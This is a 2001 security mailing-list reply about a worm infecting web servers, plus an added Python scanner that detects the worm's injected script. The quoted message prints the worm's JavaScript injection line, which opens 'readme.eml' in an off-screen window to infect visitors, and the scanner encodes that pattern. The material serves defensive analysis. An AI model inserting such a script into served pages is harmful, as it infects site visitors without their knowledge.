Re: [unisog] Some more details on the worm

From: Jeffrey Altman
Date: 09/19/01

Date: Tue, 18 Sep 2001 20:54:51 EDT
From: Jeffrey Altman
To: "Davis, Matt"
Subject: Re: [unisog] Some more details on the worm

.eml is listed in the Registry as "Microsoft Internet Mail Message"
with Content Type = "message/rfc822". On my Windows 2000 system this
will result in a program called


being executed using the Apartment threading model.

- Jeff

> When pages are served up by an infected server, it looks as though
> readme.eml is 'attached' to them. The server attempts to get the client to
> open them through the following bit of code (from the .dll file):
> <script language="JavaScript">window.open("readme.eml", null,
> "resizable=no,top=6000,left=6000")</script>
> According to Slashdot, this causes the file to be automatically opened and
> executed by the client. I haven't been able to confirm or deny that (but if
> someone can, please do).
> Regards,
> Matt
> --
> Matt Davis, MCP
> Intermediate Client Server Business Support Analyst
> COUNTRY(SM) Insurance & Financial Services
> 309-821-6288

 Jeffrey Altman * Sr.Software Designer
 The Kermit Project @ Columbia University
 C-Kermit 8.0 Beta available; includes Secure Telnet and FTP using Kerberos, SRP, and OpenSSL. SSH soon to follow.
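
Added example, not part of the original messages: a Python check a web administrator could run over served pages to find script blocks like the one Matt quotes, that is, ones that reference a .eml file, and to flag window coordinates placed off screen. The function name `scan_html`, the `OFFSCREEN_PX` threshold and the sample pages are assumptions constructed for illustration.

```python
import re

# <script ...>body</script>, any case, body may span several lines.
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script\s*>", re.I | re.S)
# A quoted file name ending in .eml, such as "readme.eml".
EML_RE = re.compile(r"""["']([^"']+\.eml)["']""", re.I)
# Window-position features such as top=6000 or left=6000.
POS_RE = re.compile(r"\b(top|left)\s*=\s*(\d+)", re.I)

OFFSCREEN_PX = 3000  # assumption: beyond the edge of any realistic display


def scan_html(html):
    """Return one finding per script block that references a .eml file."""
    findings = []
    for block in SCRIPT_RE.finditer(html):
        body = block.group(1)
        eml = EML_RE.search(body)
        if eml is None:
            continue
        coords = [int(v) for _, v in POS_RE.findall(body)]
        findings.append({
            "offset": block.start(),   # where the tag starts in the page
            "file": eml.group(1),      # the .eml name the script refers to
            "offscreen": any(v >= OFFSCREEN_PX for v in coords),
        })
    return findings


# Constructed sample pages (not captured from a real server).
CLEAN = '<html><body><script>var t = "top=10,left=10";</script>Hi</body></html>'
TAGGED = (
    "<html><body>Welcome</body></html>\n"
    '<script language="JavaScript">window.open("readme.eml", null,\n'
    '"resizable=no,top=6000,left=6000")</script>'
)
MIXED = "<SCRIPT>window.open('Notes.EML', null, 'top=40,left=40')</SCRIPT>"

if __name__ == "__main__":
    for name, page in (("clean", CLEAN), ("tagged", TAGGED), ("mixed", MIXED)):
        print(name, scan_html(page))
```

A finding with `offscreen` set is the stronger signal; a .eml reference alone still deserves a look at where the script came from.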
